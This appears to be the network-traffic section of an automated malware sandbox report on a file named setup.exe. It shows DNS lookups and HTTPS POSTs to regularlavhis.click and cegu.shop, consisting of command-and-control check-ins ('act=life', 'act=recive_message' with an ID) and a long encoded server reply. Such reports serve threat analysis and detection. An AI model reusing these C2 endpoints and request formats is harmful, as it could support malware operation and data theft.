                                                                                                                        Jan 6, 2025 15:40:23.126516104 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.126527071 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.126538038 CET49749443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.126542091 CET44349749104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.134155989 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.134226084 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.134313107 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.134602070 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.134617090 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.593509912 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.593631029 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.598025084 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.598037004 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.598273993 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:23.599469900 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.599483967 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:23.599543095 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.062683105 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.062751055 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.062802076 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.062808990 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.062839031 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.062877893 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.062886000 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.062891006 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.062933922 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.062937975 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.063342094 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.063373089 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.063386917 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.063391924 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.063438892 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.067241907 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.067317963 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.067349911 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.067358971 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.067410946 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.067449093 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.067492008 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.067507982 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.067519903 CET49750443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.067524910 CET44349750104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.216655016 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.216692924 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.216766119 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.217051983 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.217065096 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.678714037 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.678802967 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.686117887 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.686134100 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.686515093 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.696135044 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.696286917 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.696317911 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:24.696405888 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:24.696410894 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:25.482297897 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:25.482423067 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:25.482471943 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:25.482603073 CET49751443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:25.482626915 CET44349751104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:25.598543882 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:25.598563910 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:25.598628044 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:25.599153996 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:25.599167109 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.058147907 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.058270931 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.059535980 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.059542894 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.059770107 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.060789108 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.060899019 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.060934067 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.707477093 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.707600117 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.707711935 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.707834005 CET49752443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.707849979 CET44349752104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.907996893 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.908026934 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:26.908111095 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.908675909 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:26.908689022 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:27.377959967 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:27.378072977 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:27.434700012 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:27.434714079 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:27.434969902 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:27.436090946 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:27.436202049 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:27.436228991 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:27.436283112 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:27.436290979 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.086148024 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.086250067 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.086297989 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.086394072 CET49753443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.086411953 CET44349753104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.343025923 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.343061924 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.343137980 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.343424082 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.343436956 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.816103935 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.816189051 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.817329884 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.817338943 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.817564011 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:28.818634987 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.818737984 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:28.818743944 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.257081032 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.257189035 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.257241011 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.257303953 CET49754443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.257316113 CET44349754104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.307753086 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.307796955 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.307867050 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.308109045 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.308124065 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.767293930 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.767355919 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.769845009 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.769857883 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.770087004 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:29.776565075 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.776649952 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:29.776658058 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.289829969 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.289920092 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.289964914 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.290113926 CET49755443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.290131092 CET44349755104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.321702957 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.321737051 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.321794987 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.322062969 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.322077036 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.831159115 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.831234932 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.832464933 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.832473993 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.832675934 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:30.833780050 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.833807945 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:30.833847046 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.320738077 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.320827007 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.320961952 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:31.321073055 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:31.321088076 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.321099043 CET49756443192.168.2.4104.21.96.1
                                                                                                                        Jan 6, 2025 15:40:31.321105003 CET44349756104.21.96.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.379156113 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:31.379196882 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.379261017 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:31.379545927 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:31.379559040 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.095546961 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.095619917 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.097162008 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.097170115 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.097398043 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.098548889 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.143328905 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.938003063 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.938091993 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.938162088 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.938431025 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.938431025 CET49757443192.168.2.4185.161.251.21
                                                                                                                        Jan 6, 2025 15:40:32.938446045 CET44349757185.161.251.21192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:32.938458920 CET44349757185.161.251.21192.168.2.4

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 6, 2025 15:40:22.017178059 CET5066453192.168.2.41.1.1.1
                                                                                                                        Jan 6, 2025 15:40:22.030900955 CET53506641.1.1.1192.168.2.4
                                                                                                                        Jan 6, 2025 15:40:31.323905945 CET5460153192.168.2.41.1.1.1
                                                                                                                        Jan 6, 2025 15:40:31.378531933 CET53546011.1.1.1192.168.2.4

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Jan 6, 2025 15:40:22.017178059 CET192.168.2.41.1.1.10x31b7Standard query (0)regularlavhis.clickA (IP address)IN (0x0001)false
                                                                                                                        Jan 6, 2025 15:40:31.323905945 CET192.168.2.41.1.1.10x6a03Standard query (0)cegu.shopA (IP address)IN (0x0001)false

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Jan 6, 2025 15:40:22.030900955 CET1.1.1.1192.168.2.40x31b7No error (0)regularlavhis.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 6, 2025 15:40:22.030900955 CET1.1.1.1192.168.2.40x31b7No error (0)regularlavhis.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 6, 2025 15:40:22.030900955 CET1.1.1.1192.168.2.40x31b7No error (0)regularlavhis.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 6, 2025 15:40:22.030900955 CET1.1.1.1192.168.2.40x31b7No error (0)regularlavhis.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 6, 2025 15:40:22.030900955 CET1.1.1.1192.168.2.40x31b7No error (0)regularlavhis.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 6, 2025 15:40:22.030900955 CET1.1.1.1192.168.2.40x31b7No error (0)regularlavhis.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 6, 2025 15:40:22.030900955 CET1.1.1.1192.168.2.40x31b7No error (0)regularlavhis.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                        Jan 6, 2025 15:40:31.378531933 CET1.1.1.1192.168.2.40x6a03No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • regularlavhis.click
                                                                                                                        • cegu.shop

                                                                                                                        HTTPS Proxied Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.449749104.21.96.14437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:22 UTC266OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 8
                                                                                                                        Host: regularlavhis.click
                                                                                                                        2025-01-06 14:40:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                        Data Ascii: act=life
                                                                                                                        2025-01-06 14:40:23 UTC1131INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:23 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=vkg0ikhrqk29imdkft5debvlbv; expires=Fri, 02 May 2025 08:27:01 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2F29xohQv%2BTAFCf67ybWK6muYmNn75KYpTGGoyp%2B8T8v9FMpNCyQ2VWUNAUD920f8%2BCmfizuqjXjxpcxeFQWVL3CsZ37n1MHx%2BYIcXXEtVIoQd04mi1TaVTNNjMVVQOLSJExO%2FFJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc767d6f571a48-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1950&rtt_var=741&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1468074&cwnd=157&unsent_bytes=0&cid=f733bd7b2e809b61&ts=627&x=0"
                                                                                                                        2025-01-06 14:40:23 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                        Data Ascii: 2ok
                                                                                                                        2025-01-06 14:40:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.449750104.21.96.14437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:23 UTC267OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 78
                                                                                                                        Host: regularlavhis.click
                                                                                                                        2025-01-06 14:40:23 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                        2025-01-06 14:40:24 UTC1137INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:24 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=lgiqddhfl7rictl259bn6e6egv; expires=Fri, 02 May 2025 08:27:02 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMRlVY4gQIUI%2FfNYL4%2FoZ%2Bhm8fkZMd9yBfkyv%2BNC0IO%2BE%2BHaOoWjNUZD1mbA6oYwWpZAfLcMeVWcfCAQVBMiXZ0cOHJxbzX%2B0kdyjgJZ3f%2FJO1X%2F2EEybpc4BRROvrkF3YKHDdyw"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc76840f3f4363-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1548&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=981&delivery_rate=1790312&cwnd=238&unsent_bytes=0&cid=8d21162afdf375b5&ts=475&x=0"
                                                                                                                        2025-01-06 14:40:24 UTC232INData Raw: 33 61 38 38 0d 0a 34 57 4c 4c 46 2f 75 49 51 76 71 48 70 6d 53 57 43 4d 46 2b 4f 75 6c 6e 71 47 70 71 66 43 4f 2b 52 30 39 67 66 53 31 72 35 4e 57 61 51 4c 30 31 77 62 78 75 32 50 54 44 52 71 78 75 6f 42 4a 4a 6a 45 75 4b 43 77 35 65 47 64 67 6d 49 78 4d 59 41 55 6d 53 75 4d 4e 59 72 58 61 58 2b 79 66 57 70 63 4d 63 74 44 4b 61 42 52 69 4d 43 59 70 51 53 42 6c 4a 33 43 59 6a 41 68 78 47 42 4a 53 35 67 67 71 6e 63 4a 50 74 49 5a 37 6d 79 67 6e 7a 62 61 51 66 55 49 63 4f 78 51 49 48 58 67 2b 63 49 6a 56 43 52 77 38 6d 67 61 47 41 4c 36 70 6b 6b 4b 6f 2f 31 76 79 45 41 66 67 71 2b 31 78 62 6a 41 58 45 44 41 34 58 53 39 59 76 4b 77 4d 5a 52 78 75 4e 73 34 6b 4b 71 58 4f 53 35 79 69 4b 36 38
                                                                                                                        Data Ascii: 3a884WLLF/uIQvqHpmSWCMF+OulnqGpqfCO+R09gfS1r5NWaQL01wbxu2PTDRqxuoBJJjEuKCw5eGdgmIxMYAUmSuMNYrXaX+yfWpcMctDKaBRiMCYpQSBlJ3CYjAhxGBJS5ggqncJPtIZ7mygnzbaQfUIcOxQIHXg+cIjVCRw8mgaGAL6pkkKo/1vyEAfgq+1xbjAXEDA4XS9YvKwMZRxuNs4kKqXOS5yiK68
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 41 4f 2b 47 75 75 48 78 6a 46 52 63 30 51 53 45 59 42 6a 78 63 75 45 77 35 61 42 4a 61 78 77 78 2f 6e 62 4e 6e 74 4c 4e 69 39 68 41 37 34 5a 4b 59 66 56 34 77 45 79 68 6f 48 48 6b 4c 55 4c 53 6b 49 45 45 41 47 69 4c 32 45 43 4b 42 79 6c 75 30 6f 6e 75 72 48 52 72 6f 71 70 41 51 59 30 30 58 71 47 41 73 64 56 64 45 30 62 52 31 52 56 6b 6d 42 75 38 4e 59 36 58 4f 58 36 79 32 59 39 38 77 4e 2f 32 2b 78 46 31 47 47 43 4d 6f 46 41 68 46 43 33 43 49 6e 43 42 42 46 44 59 75 36 68 51 43 70 4e 64 65 71 4a 34 43 6c 6e 45 62 58 62 37 4d 62 56 4a 31 48 38 45 67 58 55 46 69 63 49 69 46 43 52 77 38 42 67 37 53 41 43 36 5a 32 6b 65 45 79 6d 50 66 43 43 2f 46 34 70 52 6c 57 67 51 62 59 41 67 59 59 51 74 55 75 4a 41 63 59 53 30 6e 49 39 34 51 59 36 53 33 5a 79 79 32 54 36
                                                                                                                        Data Ascii: AO+GuuHxjFRc0QSEYBjxcuEw5aBJaxwx/nbNntLNi9hA74ZKYfV4wEyhoHHkLULSkIEEAGiL2ECKBylu0onurHRroqpAQY00XqGAsdVdE0bR1RVkmBu8NY6XOX6y2Y98wN/2+xF1GGCMoFAhFC3CInCBBFDYu6hQCpNdeqJ4ClnEbXb7MbVJ1H8EgXUFicIiFCRw8Bg7SAC6Z2keEymPfCC/F4pRlWgQbYAgYYQtUuJAcYS0nI94QY6S3Zyy2T6
                                                                                                                        2025-01-06 14:40:24 UTC1369INData Raw: 72 71 51 35 4b 69 77 6e 59 42 41 49 59 54 74 45 70 62 55 78 66 53 42 48 47 37 38 4d 71 71 6d 47 61 34 47 4b 74 35 73 6f 49 38 33 7a 6a 41 78 61 53 52 63 30 45 53 45 59 42 30 53 51 6c 42 41 31 41 42 49 57 35 6a 51 2b 73 65 70 48 71 49 4a 58 67 77 41 33 2f 61 61 34 59 53 6f 45 46 77 67 30 4a 46 45 75 63 61 32 30 46 42 77 39 52 78 6f 61 55 43 2b 74 41 6d 75 51 75 6e 2f 4f 45 47 62 70 7a 34 78 74 55 79 31 32 4b 42 51 41 62 52 4e 4d 6b 4a 77 77 61 52 51 57 4f 75 59 41 53 70 6e 47 5a 35 69 69 53 36 4d 6f 43 2f 47 4f 6f 46 31 36 4c 42 4d 42 49 52 6c 35 47 78 47 56 31 51 69 74 49 42 59 75 34 77 54 57 71 65 35 66 74 4e 74 6a 36 69 68 2b 30 62 61 39 63 41 4d 73 4a 77 77 67 44 46 45 58 63 49 69 41 48 48 45 67 4b 69 37 43 4a 44 71 35 78 6c 65 4d 74 6e 75 58 44 41 76
